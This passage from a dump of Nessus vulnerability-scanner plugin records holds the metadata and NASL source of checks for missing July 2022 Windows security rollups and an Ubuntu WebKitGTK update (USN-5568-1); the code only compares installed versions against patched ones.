or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015870',\n '5015866'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0',\n sp:2,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015870, 5015866])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-28T15:12:58", "description": "The remote Ubuntu 20.04 LTS / 22.04 LTS host has packages installed that are affected by multiple vulnerabilities as referenced in the USN-5568-1 advisory.\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2022-32792)\n\n - The issue was addressed with improved UI handling. (CVE-2022-32816)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-15T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 22.04 LTS : WebKitGTK vulnerabilities (USN-5568-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-2294", "CVE-2022-32792", "CVE-2022-32816"], "modified": "2023-07-12T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:22.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.0", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.1", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.0", "p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.1", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-bin", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-dev", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.1-0", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.1-dev", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37-gtk2", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-dev", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.1-0", "p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.1-dev", "p-cpe:/a:canonical:ubuntu_linux:webkit2gtk-driver"], "id": "UBUNTU_USN-5568-1.NASL", "href": "https://www.tenable.com/plugins/nessus/164124", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5568-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164124);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/12\");\n\n script_cve_id(\"CVE-2022-2294\", \"CVE-2022-32792\", \"CVE-2022-32816\");\n script_xref(name:\"USN\", value:\"5568-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/15\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 22.04 LTS : WebKitGTK vulnerabilities (USN-5568-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 22.04 LTS host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the USN-5568-1 advisory.\n\n - Heap buffer overflow in WebRTC in Google Chrome prior to 103.0.5060.114 allowed a remote attacker to\n potentially exploit heap corruption via a crafted HTML page. (CVE-2022-2294)\n\n - An out-of-bounds write issue was addressed with improved input validation. (CVE-2022-32792)\n\n - The issue was addressed with improved UI handling. (CVE-2022-32816)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5568-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-32792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:22.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-javascriptcoregtk-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:gir1.2-webkit2-4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.1-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:webkit2gtk-driver\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2022-2023 Canonical, Inc. / NASL script (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('20.04' >< os_release || '22.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 20.04 / 22.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '20.04', 'pkgname': 'gir1.2-javascriptcoregtk-4.0', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'gir1.2-webkit2-4.0', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-18', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-bin', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libjavascriptcoregtk-4.0-dev', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-37', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-37-gtk2', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'libwebkit2gtk-4.0-dev', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '20.04', 'pkgname': 'webkit2gtk-driver', 'pkgver': '2.36.6-0ubuntu0.20.04.1'},\n {'osver': '22.04', 'pkgname': 'gir1.2-javascriptcoregtk-4.0', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'gir1.2-javascriptcoregtk-4.1', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'gir1.2-webkit2-4.0', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'gir1.2-webkit2-4.1', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libjavascriptcoregtk-4.0-18', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libjavascriptcoregtk-4.0-bin', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libjavascriptcoregtk-4.0-dev', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libjavascriptcoregtk-4.1-0', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libjavascriptcoregtk-4.1-dev', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libwebkit2gtk-4.0-37', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libwebkit2gtk-4.0-dev', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libwebkit2gtk-4.1-0', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'libwebkit2gtk-4.1-dev', 'pkgver': '2.36.6-0ubuntu0.22.04.1'},\n {'osver': '22.04', 'pkgname': 'webkit2gtk-driver', 'pkgver': '2.36.6-0ubuntu0.22.04.1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'gir1.2-javascriptcoregtk-4.0 / gir1.2-javascriptcoregtk-4.1 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:00:11", "description": "The remote Windows host is missing security update 5015877 or cumulative update 5015874. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015877: Windows 8.1 and Windows Server 2012 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015877.NASL", "href": "https://www.tenable.com/plugins/nessus/163042", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163042);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22038\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22041\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015874\");\n script_xref(name:\"MSKB\", value:\"5015877\");\n script_xref(name:\"MSFT\", value:\"MS22-5015874\");\n script_xref(name:\"MSFT\", value:\"MS22-5015877\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015877: Windows 8.1 and Windows Server 2012 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015877\nor cumulative update 5015874. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015877\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015874\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015877\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015877 or Cumulative Update 5015874\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22041\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-07';\nkbs = make_list(\n '5015877',\n '5015874'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'07_2022',\n bulletin:bulletin,\n rollup_kb_list:[5015877, 5015874])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-24T18:54:52", "description": "The remote Windows host is missing security update 5015862 or cumulative update 5015866. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-22024, CVE-2022-22027, CVE-2022-22029, CVE-2022-22038, CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034, CVE-2022-22036, CVE-2022-22037, CVE-2022-22041, CVE-2022-22047, CVE-2022-22049, CVE-2022-22050, CVE-2022-30202, CVE-2022-30205, CVE-2022-30206, CVE-2022-30209, CVE-2022-30220, CVE-2022-30224, CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-12T00:00:00", "type": "nessus", "title": "KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21845", "CVE-2022-22022", "CVE-2022-22023", "CVE-2022-22024", "CVE-2022-22025", "CVE-2022-22026", "CVE-2022-22027", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22036", "CVE-2022-22037", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22040", "CVE-2022-22041", "CVE-2022-22042", "CVE-2022-22043", "CVE-2022-22047", "CVE-2022-22048", "CVE-2022-22049", "CVE-2022-22050", "CVE-2022-30202", "CVE-2022-30203", "CVE-2022-30205", "CVE-2022-30206", "CVE-2022-30208", "CVE-2022-30209", "CVE-2022-30211", "CVE-2022-30213", "CVE-2022-30220", "CVE-2022-30221", "CVE-2022-30223", "CVE-2022-30224", "CVE-2022-30225", "CVE-2022-30226"], "modified": "2023-01-16T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JUL_5015862.NASL", "href": "https://www.tenable.com/plugins/nessus/163050", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163050);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/16\");\n\n script_cve_id(\n \"CVE-2022-21845\",\n \"CVE-2022-22022\",\n \"CVE-2022-22023\",\n \"CVE-2022-22024\",\n \"CVE-2022-22025\",\n \"CVE-2022-22026\",\n \"CVE-2022-22027\",\n \"CVE-2022-22028\",\n \"CVE-2022-22029\",\n \"CVE-2022-22034\",\n \"CVE-2022-22036\",\n \"CVE-2022-22037\",\n \"CVE-2022-22039\",\n \"CVE-2022-22040\",\n \"CVE-2022-22042\",\n \"CVE-2022-22043\",\n \"CVE-2022-22047\",\n \"CVE-2022-22048\",\n \"CVE-2022-22049\",\n \"CVE-2022-22050\",\n \"CVE-2022-30202\",\n \"CVE-2022-30203\",\n \"CVE-2022-30205\",\n \"CVE-2022-30206\",\n \"CVE-2022-30208\",\n \"CVE-2022-30209\",\n \"CVE-2022-30211\",\n \"CVE-2022-30213\",\n \"CVE-2022-30220\",\n \"CVE-2022-30221\",\n \"CVE-2022-30223\",\n \"CVE-2022-30224\",\n \"CVE-2022-30225\",\n \"CVE-2022-30226\"\n );\n script_xref(name:\"MSKB\", value:\"5015861\");\n script_xref(name:\"MSKB\", value:\"5015862\");\n script_xref(name:\"MSFT\", value:\"MS22-5015861\");\n script_xref(name:\"MSFT\", value:\"MS22-5015862\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/02\");\n script_xref(name:\"IAVA\", value:\"2022-A-0272-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0273-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0026\");\n\n script_name(english:\"KB5015862: Windows 7 and Windows Server 2008 R2 Security Update (July 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5015862 or \ncumulative update 5015866. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-22024,\n CVE-2022-22027, CVE-2022-22029, CVE-2022-22038,\n CVE-2022-22039, CVE-2022-30211, CVE-2022-30221)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-22023, CVE-2022-22048, CVE-2022-30203)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-22022, CVE-2022-22026, CVE-2022-22034,\n CVE-2022-22036, CVE-2022-22037, CVE-2022-22041,\n CVE-2022-22047, CVE-2022-22049, CVE-2022-22050,\n CVE-2022-30202, CVE-2022-30205, CVE-2022-30206,\n CVE-2022-30209, CVE-2022-30220, CVE-2022-30224,\n CVE-2022-30225, CVE-2022-30226).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5015862\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015861\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5015862\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5015862 or Cumulative Update 5015861\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22037\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-30221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 